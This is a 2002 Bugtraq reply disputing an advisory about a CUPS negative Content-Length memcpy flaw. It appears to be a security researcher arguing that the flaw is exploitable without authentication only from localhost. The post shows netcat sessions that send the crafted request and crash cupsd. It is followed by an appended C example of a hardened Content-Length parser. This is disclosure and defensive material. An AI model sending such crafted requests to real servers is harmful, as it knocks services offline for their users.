[28294] in bugtraq


Re: iDEFENSE Security Advisory 12.19.02: Multiple Security Vulnerabilities

daemon@ATHENA.MIT.EDU (Joe Testa)
Sat Dec 21 18:57:12 2002

To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com,
        vuldb@securityfocus.com
Message-ID: <OFDD72E5C0.7E10DF3E-ON85256C96.006D7161@hq.rapid7.com>
From: "Joe Testa" <Joe_Testa@rapid7.com>
Date: Sat, 21 Dec 2002 14:59:06 -0500

> **** ISSUE 4 - Negative Length Memcpy() Calls ****
>
> Negative length memcpy() calls can lead to a denial of service (DoS) and,
> on some platforms, remote root compromise. The following examples
> demonstrate these vulnerabilities:
>
> $ nc -v localhost 631
> localhost [127.0.0.1] 631 (?) open
> POST /printers HTTP/1.1
> Host: localhost
> Authorization: Basic AAA
> Content-Length: -1


I believe this is inaccurate/misleading.

A remote attacker cannot cause CUPSd to call memcpy() with a negative
value unless he or she is authenticated.  An attacker with local access,
however, can.  More specifically, if the attacker's source IP is 127.0.0.1,
then the server can be DOSed/overflowed without authentication.  If the
attacker's source IP is not 127.0.0.1, then the server will return an error
message without parsing the negative 'Content-Length' field.


Example:

[jdog@wonderland jdog]$ nc -v localhost 631
localhost.localdomain [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1


[jdog@wonderland jdog]$ nc -v localhost 631
localhost.localdomain [127.0.0.1] 631 (?) : Connection refused

... CUPSd has crashed.  Now let's see what happens when we use the eth0
IP:

[jdog@wonderland jdog]$ nc -v 192.168.x.x 631
192.168.x.x: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.x.x] 631 (?) open
POST /printers HTTP/1.1
Host: 192.168.x.x
Authorization: Basic AAA
Content-Length: -1

HTTP/1.1 403 Forbidden
Date: Sat, 21 Dec 2002 19:12:25 GMT
Server: CUPS/1.1
Content-Language: C
Upgrade: TLS/1.0,HTTP/1.1
Connection: close
Content-Type: text/html
Content-Length: 150

<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>
You don't have permission to access the resource on this server.</BODY>
</HTML>
[jdog@wonderland jdog]$



I'd like to point out that I have _assumed_ that the remote attacker must
authenticate in order to exploit this issue--I'm largely unfamiliar with
CUPS and I'm pressed for time...  Feel free to prove me wrong.

So, it doesn't seem like CUPSd is vulnerable to just any random attacker
who happens to be passing by.  I've tested this against RedHat 8.0's
'cups-1.1.15-10.src.rpm', along with ftp.cups.org's v1.1.14 and v1.1.17.

Word.

    - Joe Testa, Rapid 7, Inc.
    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
    A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839



(See attached file: cups.txt.asc)
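The post above turns on one detail: a "Content-Length: -1" header parsed into a signed integer and handed to memcpy(), whose length parameter is an unsigned size_t. The following is an added example, not CUPS code and not from the original post; the function names (length_seen_by_memcpy, parse_content_length) and the 1 MiB body limit are assumptions chosen for illustration. It shows what the unchecked conversion produces and a strict parser that rejects negative, signed, non-numeric and oversized values before any copy happens.

```c
/* Added example (hypothetical code, not CUPS): why a negative Content-Length
 * is dangerous, and how to reject it before it can reach memcpy(). */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Vulnerable pattern: header value parsed with atoi() into a signed int and
 * passed straight to memcpy(). memcpy() takes size_t, so -1 wraps to SIZE_MAX
 * and the copy runs off the end of the buffer. */
static size_t length_seen_by_memcpy(const char *content_length)
{
    int len = atoi(content_length);   /* "-1" -> -1 */
    return (size_t)len;               /* -> SIZE_MAX (18446744073709551615 on LP64) */
}

/* Hardened parser: unsigned decimal digits only, no sign, no trailing junk,
 * bounded by a server-side maximum. Returns -1 for anything else.
 * Assumption: the caller has already trimmed surrounding whitespace. */
static long parse_content_length(const char *value, long max_body)
{
    char *end;
    unsigned long n;

    if (value == NULL || *value == '\0')
        return -1;
    /* strtoul() silently accepts a leading '-' and wraps the result, so the
     * sign must be refused explicitly before calling it. */
    if (*value < '0' || *value > '9')
        return -1;
    errno = 0;
    n = strtoul(value, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;
    if (n > (unsigned long)max_body)
        return -1;
    return (long)n;
}

int main(void)
{
    /* Constructed sample values: the "-1" from the advisory, a sane length,
     * an oversized one and two malformed ones. */
    const char *samples[] = { "-1", "150", "2147483648", "12abc", "+5" };
    printf("unchecked: \"-1\" -> memcpy length %zu\n", length_seen_by_memcpy("-1"));
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("checked:   %-12s -> %ld\n", samples[i],
               parse_content_length(samples[i], 1L << 20));
    return 0;
}
```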


